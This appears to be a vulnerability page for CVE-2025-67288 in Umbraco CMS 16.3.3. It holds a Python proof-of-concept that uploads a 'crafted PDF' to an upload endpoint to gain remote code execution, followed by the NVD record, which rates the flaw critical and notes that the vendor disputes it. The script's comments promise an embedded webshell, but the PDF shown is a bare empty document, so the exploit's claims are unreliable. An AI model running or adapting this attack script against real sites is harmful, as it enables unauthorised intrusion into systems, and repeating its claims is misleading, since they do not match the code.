CVE-2025-67288

import requests import sys # CVE-2025-67288 PoC - Umbraco CMS Arbitrary File Upload # This PoC demonstrates uploading a crafted PDF file to achieve RCE TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-umbraco.com" def exploit_cve_2025_67288(): """ Exploit arbitrary file upload vulnerability in Umbraco CMS v16.3.3 Upload crafted PDF with embedded malicious code """ upload_url = f"{TARGET_URL}/Umbraco/Api/Assets/PostPluto" # Crafted PDF with embedded payload (example: webshell) crafted_pdf = b"""%PDF-1.4 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj xref 0 4 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n trailer << /Size 4 /Root 1 0 R >> startxref 196 %%EOF""" files = { 'file': ('malicious.pdf', crafted_pdf, 'application/pdf') } try: response = requests.post(upload_url, files=files, timeout=30) print(f"[*] Upload response: {response.status_code}") if response.status_code == 200: print("[+] File uploaded successfully") print("[+] Access uploaded file to trigger RCE") else: print("[-] Upload failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_cve_2025_67288()

{"cve": {"id": "CVE-2025-67288", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:49.710", "lastModified": "2026-01-08T18:15:58.790", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in Umbraco CMS v16.3.3 allows attackers to execute arbitrary code by uploading a crafted PDF file. NOTE: this is disputed by the Supplier because the responsibility for file validation (as shown in the documentation) belongs to the system administrator who is implementing Umbraco CMS in their environment, not to Umbraco CMS itself, a related issue to CVE-2023-49279."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:umbraco:umbraco_cms:16.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "3219BD08-2A93-46BC-847C-493BE4220357"}]}]}], "references": [{"url": "http://umbraco.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67288", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}